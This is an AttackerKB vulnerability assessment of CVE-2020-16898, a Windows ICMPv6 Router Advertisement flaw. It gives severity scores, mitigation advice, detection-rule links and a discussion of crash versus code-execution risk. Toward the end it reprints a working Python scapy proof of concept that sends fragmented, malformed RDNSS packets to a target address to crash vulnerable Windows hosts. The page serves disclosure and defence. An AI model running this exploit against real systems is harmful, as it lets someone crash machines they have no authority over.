AttackerKB AKB:9B59AD71-CB71-4C61-A639-5DC0E582DDC2
History: Oct 16, 2020 - 12:00 a.m.

CVE-2020-16898 aka Bad Neighbor / Ping of Death Redux

2020-10-16 00:00:00
attackerkb.com

CVSS3: 8.8 High
Attack Vector: ADJACENT_NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS2: 7.8 High
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: NONE
Integrity Impact: NONE
Availability Impact: COMPLETE
Vector: AV:N/AC:L/Au:N/C:N/I:N/A:C

EPSS: 0.019 Low
Percentile: 87.3%

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Remote Code Execution Vulnerability’.

Recent assessments:

kevthehermit at October 16, 2020 5:29pm UTC reported:

Overview

Crafting IPv6 ICMP Router Advertisement packets can lead to DoS or potential RCE on vulnerable devices. It is going to be difficult to develop a full RCE with this exploit. You should of course patch quickly; however, you do not need to “panic” when applying patches and mitigations for this across your estate.

The range of Windows operating systems impacted by this exploit is smaller than expected, as this is a relatively new feature in the code. Server 2019 is not widely used on the open internet, so it is unlikely to garner much attention, and automatic security updates to Windows 10 devices should mean that organisations are less vulnerable should this become a widespread, effective exploit.

Mitigation

Patching is of course the best mitigation.

Disabling IPv6 is a mitigation I have seen talked about; this is a bad idea if you don’t understand what on your system may already be using it. Instead, disable the specific feature: netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable

Detection

Suricata – <https://github.com/advanced-threat-research/CVE-2020-16898>
Snort – <https://www.snort.org/rule_docs/1-55984>
Zeek – <https://github.com/corelight/CVE-2020-16898>

Resources

Microsoft Advisory – <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16898>

McAfee have a great writeup that details the vulnerability, so I’m not going to repeat it; read it from the source :)
<https://www.mcafee.com/blogs/other-blogs/mcafee-labs/cve-2020-16898-bad-neighbor/>

QuarksLab have also released a detailed blog post explaining how they were able to create a PoC – <https://blog.quarkslab.com/beware-the-bad-neighbor-analysis-and-poc-of-the-windows-ipv6-router-advertisement-vulnerability-cve-2020-16898.html>

Context

There are two elements to this vulnerability:

DOS

It is trivial to trigger a crash condition that will lead to a BSOD and force a restart of the OS. The PoC contains Python scapy code that can be used to crash a vulnerable target.

RCE

Whilst RCE is technically possible, gaining it from this exploit alone is extremely difficult due to the nature of the vuln and the protections in place on modern Windows.

Paired with another vulnerability that can leak additional information in memory, it is possible this could lead to RCE and from there to a wormable exploit.

Proof Of Concept

The QuarksLab research includes a Python PoC that is successful at triggering a crash. The PoC is replicated and very slightly modified here.

from scapy.all import *

def trigger(target_addr):
    ip = IPv6(dst=target_addr)
    ra = ICMPv6ND_RA()

    rdnss = ICMPv6NDOptRDNSS(lifetime=900, dns=["3030:3030:3030:3030:3030:3030:3030:3030",
                                                "3131:3131:3131:3131:3131:3131:3131:3131"])
    # We put an even value for the option length (original length was 5)
    rdnss.len = len(rdnss.dns) * 2
    truncated = bytes(rdnss)[:(rdnss.len - 1) * 8]

    # The last 8 bytes of the crafted RDNSS option are interpreted as the start of a second option.
    # We build a Route Information Option here:
    # https://tools.ietf.org/html/rfc4191#section-2.3
    # Second byte (0x22) is the Length. This controls the size of the buffer overflow
    # (in this case, 0x22 * 8 == 0x110 bytes will be written to the stack buffer).
    routeinfo = b'\x18\x22\xfd\x81\x00\x00\x03\x84'

    # The value that overwrites the return address is taken from here
    correct = ICMPv6NDOptRDNSS(lifetime=900, dns=["4141:4141:4141:4141:4141:4141:4141:4141",
                                                  "4242:4242:4242:4242:4242:4242:4242:4242"])

    crafted = truncated + routeinfo

    FH = IPv6ExtHdrFragment()
    ip.hlim = 255
    packet = ip/FH/ra/crafted/correct/correct/correct/correct/correct/correct/correct/correct/correct

    # send(packet)
    # return

    frags = fragment6(packet, 100)
    print("len of packet: %d | number of frags: %d" % (len(packet), len(frags)))
    packet.show()

    for frag in frags:
        send(frag, verbose=False)

target_addr = "fe80::3935:5625:ea02:25c9"
trigger(target_addr)

zeroSteiner at October 27, 2020 7:26pm UTC reported:

cl64rk at October 13, 2020 7:09pm UTC reported:

adenosine-phosphatase at October 15, 2020 1:15pm UTC reported:

gwillcox-r7 at April 23, 2021 8:18pm UTC reported:

ccondon-r7 at December 28, 2020 11:18pm UTC reported:

Assessed Attacker Value: 4
Assessed Attacker Value: 4
Assessed Attacker Value: 2
